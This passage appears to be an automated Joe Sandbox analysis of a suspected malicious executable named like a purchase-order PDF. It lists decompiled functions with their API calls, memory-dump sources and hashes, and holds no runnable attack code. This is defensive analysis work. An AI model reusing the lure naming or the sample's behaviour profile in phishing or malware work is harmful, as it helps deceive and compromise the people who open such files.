                                                                                                                                                                                                                                                                                                              • Part of subcall function 00411A35: _doexit.LIBCMT ref: 00411A41
                                                                                                                                                                                                                                                                                                            • ___set_flsgetvalue.LIBCMT ref: 004140E1
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                                                                                                                                                                                                                                                            • ___fls_getvalue@4.LIBCMT ref: 004140EC
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                                                                                                                                                                                                                                                            • ___fls_setvalue@8.LIBCMT ref: 004140FF
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 00414108
                                                                                                                                                                                                                                                                                                            • ExitThread.KERNEL32 ref: 0041410F
                                                                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00414115
                                                                                                                                                                                                                                                                                                            • __freefls@4.LIBCMT ref: 00414135
                                                                                                                                                                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00414148
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 132634196-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: dbe0df41a3d89f03eebcd77cedb8c7fbd95cde8327ee68e759feca9a6a87dff2
                                                                                                                                                                                                                                                                                                            • Instruction ID: c6f54ac6c47f72d6c6be617d0ab0d95393642b3a08ca47198428750b18cc63fb
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dbe0df41a3d89f03eebcd77cedb8c7fbd95cde8327ee68e759feca9a6a87dff2
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EFE0B6318012096B8F0177F28E2A8DF3A2DAD56799B12842EBF10A3112DA6DD9D147AD
                                                                                                                                                                                                                                                                                                            Function 00415601 Relevance: 7.5, APIs: 5, Instructions: 23threadCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00415610
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00418540: __FindPESection.LIBCMT ref: 0041859B
                                                                                                                                                                                                                                                                                                            • __getptd_noexit.LIBCMT ref: 00415620
                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,0041566B), ref: 00415634
                                                                                                                                                                                                                                                                                                            • __freeptd.LIBCMT ref: 0041563B
                                                                                                                                                                                                                                                                                                            • ExitThread.KERNEL32 ref: 00415643
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: CloseCurrentExitFindHandleImageNonwritableSectionThread__freeptd__getptd_noexit
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 3798957060-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: d3b08fe511e09ca6ea2d918a54b62a74066439bca0a0e456eaad9824bd7e2a02
                                                                                                                                                                                                                                                                                                            • Instruction ID: 5ad9b57b40d8b41da6f03c32f2a15b2799e0bbfe2e5ad1689210a27a588f1b2a
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d3b08fe511e09ca6ea2d918a54b62a74066439bca0a0e456eaad9824bd7e2a02
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 29E01A31501A1197C2212BB9AC097DE3255AF01F36F944A6EF81A952A0DB6CD98147AD
                                                                                                                                                                                                                                                                                                            Function 0041567F Relevance: 7.5, APIs: 5, Instructions: 22threadCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00411A35: _doexit.LIBCMT ref: 00411A41
                                                                                                                                                                                                                                                                                                            • ___set_flsgetvalue.LIBCMT ref: 00415690
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                                                                                                                                                                                                                                                            • ___fls_getvalue@4.LIBCMT ref: 0041569B
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                                                                                                                                                                                                                                                            • ___fls_setvalue@8.LIBCMT ref: 004156AD
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 004156B6
                                                                                                                                                                                                                                                                                                            • ExitThread.KERNEL32 ref: 004156BD
                                                                                                                                                                                                                                                                                                            • __freefls@4.LIBCMT ref: 004156D9
                                                                                                                                                                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 004156EC
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 1537469427-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 99715b5f8e2ff19c7b8f3a2e2e0a417857e73ed83bc070766e6b29f9400adc7a
                                                                                                                                                                                                                                                                                                            • Instruction ID: 6f4b581ce684dac4bce1a6396b1ab204a3b2196504341234b7a244e47b3a25b0
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 99715b5f8e2ff19c7b8f3a2e2e0a417857e73ed83bc070766e6b29f9400adc7a
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 83E0E6308003096BCF0037F29E1A9DF392DAD41389B52841E7E14B2122DE6DD9D1466D
                                                                                                                                                                                                                                                                                                            Function 0040AB16 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 423COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: _malloc
                                                                                                                                                                                                                                                                                                            • String ID: Default$|k
                                                                                                                                                                                                                                                                                                            • API String ID: 1579825452-2254895183
                                                                                                                                                                                                                                                                                                            • Opcode ID: 6fe3f9203900dd1d6840f0fd3b032152994fd8d3dc3e6350640fe2dbd5355632
                                                                                                                                                                                                                                                                                                            • Instruction ID: 39a525bc613f0e7e9485e4ea944b13d532e73913c0a35fc25f8fa2b96209a7b9
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6fe3f9203900dd1d6840f0fd3b032152994fd8d3dc3e6350640fe2dbd5355632
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 51F19F706083018BD714DF25C484A6BB7E5AF85314F64886FF885AB392D738EC55CB9B
                                                                                                                                                                                                                                                                                                            Function 0044F0B1 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 377COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: _memcmp
                                                                                                                                                                                                                                                                                                            • String ID: '$[$h
                                                                                                                                                                                                                                                                                                            • API String ID: 2931989736-1224472061
                                                                                                                                                                                                                                                                                                            • Opcode ID: b65a2ba19e68ffe8a11284d2d069350b2f2ae6a9059e42b54d6f98484e49560c
                                                                                                                                                                                                                                                                                                            • Instruction ID: c2eec353cbd26a418970a1643da97c958d9efd09d44d369c5aec2a2e92b02032
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b65a2ba19e68ffe8a11284d2d069350b2f2ae6a9059e42b54d6f98484e49560c
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EBE1B3756083858FE725CF28C8807ABBBE1FFC9304F18896EE89587341D7799849CB56
                                                                                                                                                                                                                                                                                                            Function 0044F1F5 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 358COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: _strncmp
                                                                                                                                                                                                                                                                                                            • String ID: >$R$U
                                                                                                                                                                                                                                                                                                            • API String ID: 909875538-1924298640
                                                                                                                                                                                                                                                                                                            • Opcode ID: f9ebc198af2ab7ab0819517e001d9756788144751dce64bc403378e3fae079f3
                                                                                                                                                                                                                                                                                                            • Instruction ID: f6794502b7c89560a677b30a08de70cb8bc1b17d125f16f135907c58c8460d8d
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f9ebc198af2ab7ab0819517e001d9756788144751dce64bc403378e3fae079f3
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 46E19C745083818FEB25CF29C49076BBBE1EFD9304F28496EE89587381D378E849CB56
                                                                                                                                                                                                                                                                                                            Function 0046CDA0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 263comCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82
                                                                                                                                                                                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 0046CE18
                                                                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 0046CE31
                                                                                                                                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 0046CE50
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                                                                                                                                                                                            • String ID: .lnk
                                                                                                                                                                                                                                                                                                            • API String ID: 886957087-24824748
                                                                                                                                                                                                                                                                                                            • Opcode ID: cf95cfa125c39178dc1728bd48ca6ee468afe444b27fb378bb5b47a8cf5920ff
                                                                                                                                                                                                                                                                                                            • Instruction ID: 09ec1e36491b9dee8eccbfa157b0fc1a83632a56aae6c10d58f94140378ad3aa
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cf95cfa125c39178dc1728bd48ca6ee468afe444b27fb378bb5b47a8cf5920ff
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D3A1ABB5A042019FC704EF64C980E6BB7E9EF88714F14895EF8849B392D735EC45CBA6
                                                                                                                                                                                                                                                                                                            Function 00469BED Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 219COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00469C37
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: _wcslen
                                                                                                                                                                                                                                                                                                            • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                                                                                                                                                                                                            • API String ID: 176396367-557222456
                                                                                                                                                                                                                                                                                                            • Opcode ID: 6ed3ee7040cf52f7c8cf58c24b37417f7719ae2cfab6dfb5b0d2deafceea8a2b
                                                                                                                                                                                                                                                                                                            • Instruction ID: 5ec49088f7a0f5eff408c40ec761cfb1cab3d77d8e9f1d748350f88cc39ab646
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6ed3ee7040cf52f7c8cf58c24b37417f7719ae2cfab6dfb5b0d2deafceea8a2b
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2C818F715183009FC310EF65C88186BB7E8AF85714F408A2FF5959B2A2E778ED45CB9B
                                                                                                                                                                                                                                                                                                            Function 0042D2CC Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 204COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(00000000), ref: 0042D2E0
                                                                                                                                                                                                                                                                                                            • VariantCopy.OLEAUT32(?,?), ref: 0042D2EE
                                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(00000000), ref: 0042D2FF
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Variant$ClearCopyInit_malloc
                                                                                                                                                                                                                                                                                                            • String ID: 4RH
                                                                                                                                                                                                                                                                                                            • API String ID: 2981388473-749298218
                                                                                                                                                                                                                                                                                                            • Opcode ID: b920f10f783b350eb70fbfbd5e93e4346c96a834e76a4c916b96fd977c33ade8
                                                                                                                                                                                                                                                                                                            • Instruction ID: 2430bd0654d197d786bc988f6f01769df72c779a088326c60667d263ff95ce9f
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b920f10f783b350eb70fbfbd5e93e4346c96a834e76a4c916b96fd977c33ade8
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CC913874A083519FC720CF29D480A1AB7E1FF89304F64892EE999DB351D774EC85CB96
                                                                                                                                                                                                                                                                                                            Function 004667A7 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 170shareCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                                                                                                                                                                                                                            • __wcsnicmp.LIBCMT ref: 0046681A
                                                                                                                                                                                                                                                                                                            • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 004668B9
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
